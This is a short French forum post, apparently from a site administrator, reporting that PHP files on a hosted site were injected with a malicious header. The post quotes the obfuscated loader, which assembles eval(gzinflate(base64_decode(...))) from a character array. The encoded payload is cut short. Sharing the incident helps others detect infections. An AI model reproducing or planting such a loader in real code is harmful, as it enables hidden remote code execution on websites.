Bonjour
On vient d'avoir un souci de ce type (hébergeur celeonet).
Les fichiers .php du site (pas seulement ceux de galette, mais aussi de joomla et smf, se sont vu "enrichi" d'un en-tête php , différent pour chaque fichier, mais dont la structure est toujours la même :
<?php
2$md5 = "37004a099a9bc582ad0557d0a5dc94ca";
3$ac = array('o','f','b',"(",'s','i','t',"d",";",'6','4',"v",'c','n',"$",'r',"_","a","l","g","e","z",")");
4$bc8 = create_function('$'.'v',$ac[20].$ac[11].$ac[17].$ac[18].$ac[3].$ac[19].$ac[21].$ac[5].$ac[13].$ac[1].$ac[18].$ac[17].$ac[6].$ac[20].$ac[3].$ac[2].$ac[17].$ac[4].$ac[20].$ac[9].$ac[10].$ac[16].$ac[7].$ac[20].$ac[12].$ac[0].$ac[7].$ac[20].$ac[3].$ac[14].$ac[11].$ac[22].$ac[22].$ac[22].$ac[8]);
5$bc8('D un flot de caractères comme ça! ...EQPEvwP//+++9//w8=');
6?>
Seul galette a été impacté. Heurreusement d'ailleurs, ça a permis de voir.
Rien trouvé sur le net
Avec un ftp il faut editer les fichiers présents sur le serveur.
L'infection a eu lieu à deux reprises, la premier dimanche 29.
A toutes fins utiles....